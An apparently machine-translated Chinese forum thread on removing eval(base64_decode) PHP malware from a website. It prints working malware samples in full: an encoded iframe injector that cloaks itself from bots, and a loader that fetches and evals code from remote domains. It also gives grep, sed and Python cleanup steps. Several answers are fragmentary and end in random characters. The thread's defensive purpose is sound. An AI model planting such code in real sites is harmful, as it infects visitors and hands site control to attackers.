如何摆脱eval-base64_decode这样的PHP病毒文件?
|
我的网站(大型社区网站)最近感染了病毒。每个
index.php
<?php eval(base64_decode(\'ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0=\'));
<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array(\'bot\',\'spider\',\'spyder\',\'crawl\',\'validator\',\'slurp\',\'docomo\',\'yandex\',\'mail.ru\',\'alexa.com\',\'postrank.com\',\'htmldoc\',\'webcollage\',\'blogpulse.com\',\'anonymouse.org\',\'12345\',\'httpclient\',\'buzztracker.com\',\'snoopy\',\'feedtools\',\'arianna.libero.it\',\'internetseer.com\',\'openacoon.de\',\'rrrrrrrrr\',\'magent\',\'download master\',\'drupal.org\',\'vlc media player\',\'vvrkimsjuwly l3ufmjrx\',\'szn-image-resizer\',\'bdbrandprotect.com\',\'wordpress\',\'rssreader\',\'mybloglog api\');
$stop_ips_masks = array(
array(\"216.239.32.0\",\"216.239.63.255\"),
array(\"64.68.80.0\" ,\"64.68.87.255\" ),
array(\"66.102.0.0\", \"66.102.15.255\"),
array(\"64.233.160.0\",\"64.233.191.255\"),
array(\"66.249.64.0\", \"66.249.95.255\"),
array(\"72.14.192.0\", \"72.14.255.255\"),
array(\"209.85.128.0\",\"209.85.255.255\"),
array(\"198.108.100.192\",\"198.108.100.207\"),
array(\"173.194.0.0\",\"173.194.255.255\"),
array(\"216.33.229.144\",\"216.33.229.151\"),
array(\"216.33.229.160\",\"216.33.229.167\"),
array(\"209.185.108.128\",\"209.185.108.255\"),
array(\"216.109.75.80\",\"216.109.75.95\"),
array(\"64.68.88.0\",\"64.68.95.255\"),
array(\"64.68.64.64\",\"64.68.64.127\"),
array(\"64.41.221.192\",\"64.41.221.207\"),
array(\"74.125.0.0\",\"74.125.255.255\"),
array(\"65.52.0.0\",\"65.55.255.255\"),
array(\"74.6.0.0\",\"74.6.255.255\"),
array(\"67.195.0.0\",\"67.195.255.255\"),
array(\"72.30.0.0\",\"72.30.255.255\"),
array(\"38.0.0.0\",\"38.255.255.255\")
);
$my_ip2long = sprintf(\"%u\",ip2long($_SERVER[\'REMOTE_ADDR\']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf(\"%u\",ip2long($IPs[0])); $second_d=sprintf(\"%u\",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER[\'HTTP_USER_AGENT\'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo \'<div style=\"position: absolute; left: -1999px; top: -2999px;\"><iframe src=\"http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==\" width=\"2\" height=\"2\"></iframe></div>\';
}
没有找到相关结果
已邀请:
7 个回复
献导外拘
2)从服务器下载所有文件的副本 将所有内容从良好的备份下载到单独的文件夹中。这可能需要一段时间(取决于您的站点大小,连接速度等)。 3)下载并安装文件/文件夹比较实用程序 在Windows计算机上,您可以使用WinMerge-http://winmerge.org/-它是免费的并且功能强大。 在MacOS机器上,从Alternative.to中检查可能的替代项列表。 4)运行文件/文件夹比较实用程序 您最终应该得到一些不同的结果: 文件相同-当前文件与您的备份相同,因此不受影响。 仅位于左侧/右侧的文件-该文件仅存在于备份中(可能已从服务器中删除),或者仅存在于服务器中(并且可能已被黑客注入/创建)。 文件不同-服务器上的文件与备份中的文件不同,因此它可能已经由您(为服务器配置)或由黑客(以注入代码)修改。 5)解决差异 (又名“为什么我们都不能相处呢?”) 对于相同的文件,无需采取进一步措施。 对于仅存在于一侧的文件,请查看该文件并确定它们是否合法(例如,用户上传的文件应该在那里,您可能已添加的其他文件,等等)。 对于不同的文件,请查看该文件(“文件差异实用程序”甚至可以显示已添加/修改/删除的行),并查看服务器版本是否有效。覆盖(使用备份版本)包含恶意代码的所有文件。 6)查看您的安全注意事项 无论是像更改FTP / cPanel密码那样简单,还是要检查对外部/不受控制的资源的使用(如您提到的,您正在执行很多fget,fopen等),您可能需要检查传递给它们的参数。是一种使脚本提取恶意代码的方法)等。 7)检查现场工程 在纠正了受感染的文件并删除了恶意文件之后,请利用机会成为唯一查看该网站的人,以确保一切都按预期进行。 8)打开门 撤消在步骤1中对.htaccess文件所做的更改。请仔细观察。密切注意您的访问者和错误日志,以查看是否有人试图触发已删除的恶意文件等。 9)考虑自动检测方法 有几种解决方案,可让您在主机上执行自动检查(使用CRON作业),该检查将检测并详细说明发生的任何更改。有些有点冗长(每个更改的文件都会收到一封电子邮件),但是您应该能够使它们适应您的需求: Tripwire-一个用于检测和报告新文件,删除文件或修改文件的PHP脚本 Shell脚本来监视文件更改 如何检测您的Web服务器是否被黑客入侵并收到警报 10)计划好备份,并保持良好的状态 确保已计划在网站上执行备份,并保留其中一些备份,以便您有不同的步骤,可以根据需要及时返回。例如,如果您执行每周备份,则可能需要保留以下内容: 4 x每周备份 4 x每月备份(您保留一个每周备份,可能是每月的第一周,作为每月备份) 如果您有人用比代码注入攻击更具破坏性的方式攻击您的站点,这些将使生活变得更加轻松。 哦,还要确保您也备份数据库-很多站点都是基于CMS的,文件很好,但是如果丢失/损坏了它们背后的数据库,那么备份基本上就没有用了。呢率篓舍烫
视蕉梁拌客
import os import re import sys def try_to_replace(fname): if replace_extensions: return fname.lower().endswith(\".php\") return True def file_replace(fname, pat, s_after): # first, see if the pattern is even in the file. with open(fname) as f: if not any(re.search(pat, line) for line in f): return # pattern does not occur in file so we are done. # pattern is in the file, so perform replace operation. with open(fname) as f: out_fname = fname + \".tmp\" out = open(out_fname, \"w\") for line in f: out.write(re.sub(pat, s_after, line)) out.close() os.rename(out_fname, fname) def mass_replace(dir_name, s_before, s_after): pat = re.compile(s_before) for dirpath, dirnames, filenames in os.walk(dir_name): for fname in filenames: if try_to_replace(fname): print \"cleaning: \" + fname fullname = os.path.join(dirpath, fname) file_replace(fullname, pat, s_after) if len(sys.argv) != 2: u = \"Usage: rescue.py <dir_name>\\n\" sys.stderr.write(u) sys.exit(1) mass_replace(sys.argv[1], \"eval\\(base64_decode\\([^.]*\\)\\);\", \"\")<?php if (function_exists(\'ob_start\') && !isset($_SERVER[\'mr_no\'])) { $_SERVER[\'mr_no\'] = 1; if (!function_exists(\'mrobh\')) { function get_tds_777($url) { $content = \"\"; $content = @trycurl_777($url); if ($content !== false) return $content; $content = @tryfile_777($url); if ($content !== false) return $content; $content = @tryfopen_777($url); if ($content !== false) return $content; $content = @tryfsockopen_777($url); if ($content !== false) return $content; $content = @trysocket_777($url); if ($content !== false) return $content; return \'\'; } function trycurl_777($url) { if (function_exists(\'curl_init\') === false) return false; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_HEADER, 0); $result = curl_exec($ch); curl_close($ch); if ($result == \"\") return false; return $result; } function tryfile_777($url) { if (function_exists(\'file\') === false) return false; $inc = @file($url); $buf = @implode(\'\', $inc); if ($buf == \"\") return false; return $buf; } function tryfopen_777($url) { if (function_exists(\'fopen\') === false) return false; $buf = \'\'; $f = @fopen($url, \'r\'); if ($f) { while (!feof($f)) { $buf .= fread($f, 10000); } fclose($f); } else return false; if ($buf == \"\") return false; return $buf; } function tryfsockopen_777($url) { if (function_exists(\'fsockopen\') === false) return false; $p = @parse_url($url); $host = $p[\'host\']; $uri = $p[\'path\'] . \'?\' . $p[\'query\']; $f = @fsockopen($host, 80, $errno, $errstr, 30); if (!$f) return false; $request = \"GET $uri HTTP/1.0\\n\"; $request .= \"Host: $host\\n\\n\"; fwrite($f, $request); $buf = \'\'; while (!feof($f)) { $buf .= fread($f, 10000); } fclose($f); if ($buf == \"\") return false; list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf); return $buf; } function trysocket_777($url) { if (function_exists(\'socket_create\') === false) return false; $p = @parse_url($url); $host = $p[\'host\']; $uri = $p[\'path\'] . \'?\' . $p[\'query\']; $ip1 = @gethostbyname($host); $ip2 = @long2ip(@ip2long($ip1)); if ($ip1 != $ip2) return false; $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if (!@socket_connect($sock, $ip1, 80)) { @socket_close($sock); return false; } $request = \"GET $uri HTTP/1.0\\n\"; $request .= \"Host: $host\\n\\n\"; socket_write($sock, $request); $buf = \'\'; while ($t = socket_read($sock, 10000)) { $buf .= $t; } @socket_close($sock); if ($buf == \"\") return false; list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf); return $buf; } function update_tds_file_777($tdsfile) { $actual1 = $_SERVER[\'s_a1\']; $actual2 = $_SERVER[\'s_a2\']; $val = get_tds_777($actual1); if ($val == \"\") $val = get_tds_777($actual2); $f = @fopen($tdsfile, \"w\"); if ($f) { @fwrite($f, $val); @fclose($f); } if (strstr($val, \"|||CODE|||\")) { list($val, $code) = explode(\"|||CODE|||\", $val); eval(base64_decode($code)); } return $val; } function get_actual_tds_777() { $defaultdomain = $_SERVER[\'s_d1\']; $dir = $_SERVER[\'s_p1\']; $tdsfile = $dir . \"log1.txt\"; if (@file_exists($tdsfile)) { $mtime = @filemtime($tdsfile); $ctime = time() - $mtime; if ($ctime > $_SERVER[\'s_t1\']) { $content = update_tds_file_777($tdsfile); } else { $content = @file_get_contents($tdsfile); } } else { $content = update_tds_file_777($tdsfile); } $tds = @explode(\"\\n\", $content); $c = @count($tds) + 0; $url = $defaultdomain; if ($c > 1) { $url = trim($tds[mt_rand(0, $c - 2)]); } return $url; } function is_mac_777($ua) { $mac = 0; if (stristr($ua, \"mac\") || stristr($ua, \"safari\")) if ((!stristr($ua, \"windows\")) && (!stristr($ua, \"iphone\"))) $mac = 1; return $mac; } function is_msie_777($ua) { $msie = 0; if (stristr($ua, \"MSIE 6\") || stristr($ua, \"MSIE 7\") || stristr($ua, \"MSIE 8\") || stristr($ua, \"MSIE 9\")) $msie = 1; return $msie; } function setup_globals_777() { $rz = $_SERVER[\"DOCUMENT_ROOT\"] . \"/.logs/\"; $mz = \"/tmp/\"; if (!@is_dir($rz)) { @mkdir($rz); if (@is_dir($rz)) { $mz = $rz; } else { $rz = $_SERVER[\"SCRIPT_FILENAME\"] . \"/.logs/\"; if (!@is_dir($rz)) { @mkdir($rz); if (@is_dir($rz)) { $mz = $rz; } } else { $mz = $rz; } } } else { $mz = $rz; } $bot = 0; $ua = $_SERVER[\'HTTP_USER_AGENT\']; if (stristr($ua, \"msnbot\") || stristr($ua, \"Yahoo\")) $bot = 1; if (stristr($ua, \"bingbot\") || stristr($ua, \"google\")) $bot = 1; $msie = 0; if (is_msie_777($ua)) $msie = 1; $mac = 0; if (is_mac_777($ua)) $mac = 1; if (($msie == 0) && ($mac == 0)) $bot = 1; global $_SERVER; $_SERVER[\'s_p1\'] = $mz; $_SERVER[\'s_b1\'] = $bot; $_SERVER[\'s_t1\'] = 1200; $_SERVER[\'s_d1\'] = base64_decode(\'http://ens122zzzddazz.com/\'); $d = \'?d=\' . urlencode($_SERVER[\"HTTP_HOST\"]) . \"&p=\" . urlencode($_SERVER[\"PHP_SELF\"]) . \"&a=\" . urlencode($_SERVER[\"HTTP_USER_AGENT\"]); $_SERVER[\'s_a1\'] = base64_decode(\'http://cooperjsutf8.ru/g_load.php\') . $d; $_SERVER[\'s_a2\'] = base64_decode(\'http://nlinthewood.com/g_load.php\') . $d; $_SERVER[\'s_script\'] = \"nl.php?p=d\"; } setup_globals_777(); if (!function_exists(\'gml_777\')) { function gml_777() { $r_string_777 = \'\'; if ($_SERVER[\'s_b1\'] == 0) $r_string_777 = \'<script src=\"\' . get_actual_tds_777() . $_SERVER[\'s_script\'] . \'\"></script>\'; return $r_string_777; } } if (!function_exists(\'gzdecodeit\')) { function gzdecodeit($decode) { $t = @ord(@substr($decode, 3, 1)); $start = 10; $v = 0; if ($t & 4) { $str = @unpack(\'v\', substr($decode, 10, 2)); $str = $str[1]; $start += 2 + $str; } if ($t & 8) { $start = @strpos($decode, chr(0), $start) + 1; } if ($t & 16) { $start = @strpos($decode, chr(0), $start) + 1; } if ($t & 2) { $start += 2; } $ret = @gzinflate(@substr($decode, $start)); if ($ret === FALSE) { $ret = $decode; } return $ret; } } function mrobh($content) { @Header(\'Content-Encoding: none\'); $decoded_content = gzdecodeit($content); if (preg_match(\'/\\<\\/body/si\', $decoded_content)) { return preg_replace(\'/(\\<\\/body[^\\>]*\\>)/si\', gml_777() . \"\\n\" . \'$1\', $decoded_content); } else { return $decoded_content . gml_777(); } } ob_start(\'mrobh\'); } } ?>臂哦
,,, 等等 通过使用编码格式,它们缩小了尺寸,使经验不足的用户更难以解码。 以下是一些命令,它们可能找到最常见的恶意软件PHP代码:grep -R return.*base64_decode . grep --include=\\*.php -rn \'return.*base64_decode($v.\\{6\\})\' .)运行这些命令。 或使用专为查找此类恶意文件而设计的扫描工具,请参阅:PHP安全扫描器。 出于教育目的,请找到以下PHP利用脚本集合,该集合是在kenorb / php-exploit-scripts GitHub(受@Mattias原始集合影响)上调查被黑客入侵的服务器时找到的。这将使您了解这些PHP可疑文件的外观,因此您可以学习如何在服务器上找到更多这些文件。 也可以看看: 这个恶意的PHP脚本有什么作用? Drupal:被黑客入侵后,如何从管理页面中删除恶意脚本?剑哎
淘圃跺枯替
的输出与受保护的服务器进行比较,并检查和是否存在可疑文件。您可能必须重新安装操作系统。 确保管理服务器的所有工作站都是最新的并且干净的。不要通过不安全的无线连接进行连接,也不要像FTP一样使用纯文本身份验证(改为使用SFTP)。仅使用https登录控制面板。 为防止再次发生这种情况,请运行csf或类似的防火墙,每天进行LMD扫描,并为服务器上的所有应用程序获取最新的安全补丁程序。徐百晴墓斜
find . -name \"*.php\" | xargs sed -i \'s@eval[ \\t]*([ \\t]*base64_decode[ \\t]*([ \\t]*[\'\"\'\"\'\"][A-Za-z0-9/_=+:!.-]\\{1,\\}[\'\"\'\"\'\"][ \\t]*)[ \\t]*)[ \\t]*;@@\'